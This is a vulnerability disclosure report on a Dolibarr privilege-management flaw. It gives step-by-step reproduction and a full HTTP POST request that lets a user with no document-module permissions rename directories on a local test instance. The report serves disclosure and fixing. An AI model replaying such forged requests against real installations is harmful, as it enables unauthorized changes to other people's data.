Improper Privilege Management in Dolibarr/dolibarr

Valid
Reported on May 19th 2021

💥 BUG

unprivileged user can modify directory

💥 STEP TO REPRODUCE

1. From admin account add user B as normal user .
Now dont give any permission for DMS/ECM module for user B .
So, user B should not see any DMS/ECM details .

2. Now from admin account goto https://localhost/dolibarr/htdocs/ecm/index.php?idmenu=27&mainmenu=ecm&leftmenu= and create a directory.

3. Finally goto user B account and visit https://localhost/dolibarr/htdocs/ecm/index.php?idmenu=27&mainmenu=ecm&leftmenu= and here user B cant see any document .
Now user B sent bellow request in burpsuite to modify the directory.\

POST /dolibarr/htdocs/ecm/dir_card.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 157
Origin: http://localhost
Connection: close
Referer: http://localhost/dolibarr/htdocs/ecm/dir_card.php?action=edit&module=ecm&section=1
Cookie: DOLSESSID_0553a67aec6c8cfb8172aadb09812143=4ueq8h2hcsro2cicatu2umspk9
Upgrade-Insecure-Requests: 1
ACCOUNT: TEST2

token=$2y$10$BjOBaoHhJHpIOuAkpCxJseCRvbpVpCOLVMinej07eYd4XF8Jmrxo.&section=2&module=ecm&action=update&label=bb2_by_usesdrssss&description=jhhghjg&submit=Save

💥 VIDEO

https://drive.google.com/file/d/17EfTnjTdAeJ2dPnC6Fqi3vnp7iQIKqqA/view?usp=sharing

💥 Impact

privilege escalation bug to modify directory